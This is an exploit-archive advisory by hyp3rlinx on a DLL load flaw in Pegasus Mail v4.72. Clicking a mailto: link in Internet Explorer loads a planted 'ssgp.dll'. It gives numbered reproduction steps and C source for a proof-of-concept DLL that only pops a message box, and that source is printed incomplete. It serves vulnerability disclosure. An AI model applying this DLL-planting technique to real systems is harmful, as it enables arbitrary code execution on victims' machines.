Pegasus winpm-32.exe v4.72 Mailto: Link Remote Code Execution Vulnerability

ID 1337DAY-ID-27812
Type zdt
Reporter hyp3rlinx
Modified 2017-05-20T00:00:00


Exploit for windows platform in category remote exploits

                                            [+] Credits: John Page AKA hyp3rlinx
[+] Website:
[+] Source:


Pegasus "winpm-32.exe"
v4.72 build 572

Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.

Vulnerability Type:
Remote Code Execution

CVE Reference:

Security Issue:
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.


<a href="mailto:[email protected]">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install.

1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.

2) Compile "ssgp.dll" as DLL using below 'C' code.


//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);

return 0;

3) Place "ssgp.dll" on Desktop

4) Create an HTML file with following in the web server root directory.
<a href="mailto:[email protected]">Pegasus Exploit POC</a>

5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.

Our code gets executed...

# [2018-04-10]  #